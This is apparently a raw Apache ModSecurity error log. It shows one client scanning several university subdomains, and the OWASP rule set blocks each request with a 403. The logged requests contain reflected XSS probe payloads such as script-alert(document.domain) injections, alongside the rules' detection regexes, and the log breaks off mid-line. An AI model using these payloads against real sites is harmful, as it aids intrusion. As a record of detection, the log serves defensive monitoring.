[Tue Aug 29 11:51:20.724292 2023] [:error] [pid 2491] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:id: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/phpmyadmin/setup/index.php"] [unique_id "ZO15SMCo-f0AAAm7m90AAAAE"]
[Tue Aug 29 11:51:20.725301 2023] [:error] [pid 2445] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:id: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/phpmyadmin/setup/index.php"] [unique_id "ZO15SMCo-f0AAAmNp38AAAAQ"]
[Tue Aug 29 11:51:20.726955 2023] [:error] [pid 2493] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:id: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/phpmyadmin/setup/index.php"] [unique_id "ZO15SMCo-f0AAAm91m4AAAAG"]
[Tue Aug 29 11:51:21.536477 2023] [:error] [pid 2347] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:RESULT. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );// found within ARGS:RESULT: \\x22,msgArray);alert(document.domain);//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/info.php"] [unique_id "ZO15ScCo-f0AAAkr0FIAAAAC"]
[Tue Aug 29 11:51:21.539219 2023] [:error] [pid 2491] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:RESULT. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );// found within ARGS:RESULT: \\x22,msgArray);alert(document.domain);//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/info.php"] [unique_id "ZO15ScCo-f0AAAm7m94AAAAE"]
[Tue Aug 29 11:51:21.551159 2023] [:error] [pid 2145] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:searchOwnerUserName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:searchOwnerUserName: <script>alert(1)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/secure/ConfigurePortalPages!default.jspa"] [unique_id "ZO15ScCo-f0AAAhhc1MAAAAd"]
[Tue Aug 29 11:51:21.592023 2023] [:error] [pid 2497] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:RESULT. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );// found within ARGS:RESULT: \\x22,msgArray);alert(document.domain);//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/info.php"] [unique_id "ZO15ScCo-f0AAAnB5U0AAAAJ"]
[Tue Aug 29 11:51:21.628007 2023] [:error] [pid 2445] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:id: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/setup/index.php"] [unique_id "ZO15ScCo-f0AAAmNp4EAAAAQ"]
[Tue Aug 29 11:51:21.628304 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:id: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/setup/index.php"] [unique_id "ZO15ScCo-f0AAAlUliMAAAA0"]
[Tue Aug 29 11:51:21.628923 2023] [:error] [pid 2492] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:id: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/setup/index.php"] [unique_id "ZO15ScCo-f0AAAm80OcAAAAF"]
[Tue Aug 29 11:51:21.629404 2023] [:error] [pid 2376] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:id: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/setup/index.php"] [unique_id "ZO15ScCo-f0AAAlIBhsAAAAn"]
[Tue Aug 29 11:51:21.648934 2023] [:error] [pid 2443] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:id: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/setup/index.php"] [unique_id "ZO15ScCo-f0AAAmLPScAAAAN"]
[Tue Aug 29 11:51:21.648940 2023] [:error] [pid 2343] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:searchOwnerUserName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:searchOwnerUserName: <script>alert(1)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/secure/ConfigurePortalPages!default.jspa"] [unique_id "ZO15ScCo-f0AAAknEOgAAAAB"]
[Tue Aug 29 11:51:21.654984 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:RESULT. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );// found within ARGS:RESULT: \\x22,msgArray);alert(document.domain);//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/info.php"] [unique_id "ZO15ScCo-f0AAAnHQdoAAAAT"]
[Tue Aug 29 11:51:21.672853 2023] [:error] [pid 2515] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:RESULT. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );// found within ARGS:RESULT: \\x22,msgArray);alert(document.domain);//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/info.php"] [unique_id "ZO15ScCo-f0AAAnTlJ4AAAAA"]
[Tue Aug 29 11:51:21.693259 2023] [:error] [pid 2508] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:RESULT. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: );// found within ARGS:RESULT: \\x22,msgArray);alert(document.domain);//"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/info.php"] [unique_id "ZO15ScCo-f0AAAnMepQAAAAD"]
[Tue Aug 29 11:51:21.693581 2023] [:error] [pid 2493] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:searchOwnerUserName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:searchOwnerUserName: <script>alert(1)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/secure/ConfigurePortalPages!default.jspa"] [unique_id "ZO15ScCo-f0AAAm91nAAAAAG"]
[Tue Aug 29 11:51:21.701662 2023] [:error] [pid 2269] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:searchOwnerUserName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:searchOwnerUserName: <script>alert(1)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/secure/ConfigurePortalPages!default.jspa"] [unique_id "ZO15ScCo-f0AAAjdQUAAAAAZ"]
[Tue Aug 29 11:51:21.701806 2023] [:error] [pid 2439] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:searchOwnerUserName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:searchOwnerUserName: <script>alert(1)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/secure/ConfigurePortalPages!default.jspa"] [unique_id "ZO15ScCo-f0AAAmHd@gAAAAz"]
[Tue Aug 29 11:51:21.727873 2023] [:error] [pid 2445] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:searchOwnerUserName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:searchOwnerUserName: <script>alert(1)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/secure/ConfigurePortalPages!default.jspa"] [unique_id "ZO15ScCo-f0AAAmNp4IAAAAQ"]
[Tue Aug 29 11:51:21.815577 2023] [:error] [pid 2491] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:id: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/phpmyadmin/setup/index.php"] [unique_id "ZO15ScCo-f0AAAm7m@AAAAAE"]
[Tue Aug 29 11:51:22.686330 2023] [:error] [pid 2439] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:filtervalue. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:filtervalue: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/Portal/Portal.mwsl"] [unique_id "ZO15SsCo-f0AAAmHd@kAAAAz"]
[Tue Aug 29 11:51:22.728829 2023] [:error] [pid 2343] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:filtervalue. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:filtervalue: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/Portal/Portal.mwsl"] [unique_id "ZO15SsCo-f0AAAknEOkAAAAB"]
[Tue Aug 29 11:51:22.731119 2023] [:error] [pid 2269] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:filtervalue. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:filtervalue: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/Portal/Portal.mwsl"] [unique_id "ZO15SsCo-f0AAAjdQUEAAAAZ"]
[Tue Aug 29 11:51:22.788889 2023] [:error] [pid 2497] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:filtervalue. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:filtervalue: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/Portal/Portal.mwsl"] [unique_id "ZO15SsCo-f0AAAnB5U8AAAAJ"]
[Tue Aug 29 11:51:22.897462 2023] [:error] [pid 2494] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:id: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag 